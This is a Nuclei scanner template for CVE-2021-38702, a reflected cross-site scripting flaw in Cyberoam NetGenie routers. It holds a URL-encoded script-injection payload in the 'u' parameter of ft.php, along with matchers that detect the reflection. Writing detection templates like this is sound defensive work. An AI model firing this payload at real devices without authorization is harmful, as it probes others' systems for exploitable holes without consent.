nuclei-templates/cves/2021/CVE-2021-38702.yaml

35 lines
925 B
YAML
Raw Normal View History

2021-08-17 13:11:02 +00:00
id: CVE-2021-38702
info:
name: Cyberoam NetGenie XSS
author: geeknik
severity: medium
2021-08-17 16:36:37 +00:00
description: Cyberoam NetGenie C0101B1-20141120-NG11VO devices through 2021-08-14 allow for reflected Cross Site Scripting via the 'u' parameter of ft.php.
reference: https://seclists.org/fulldisclosure/2021/Aug/20
tags: cve,cve2021,cyberoam,netgenie,xss,router
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
cve-id: CVE-2021-38702
cwe-id: CWE-79
2021-08-17 13:11:02 +00:00
requests:
- method: GET
path:
2021-08-17 16:36:37 +00:00
- "{{BaseURL}}/tweb/ft.php?u=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
2021-08-17 13:11:02 +00:00
matchers-condition: and
matchers:
- type: word
words:
2021-08-17 16:36:37 +00:00
- "</script><script>alert(document.domain)</script>"
2021-08-17 13:11:02 +00:00
- type: word
words:
- "text/html"
part: header
2021-08-17 16:36:37 +00:00
- type: status
status:
- 200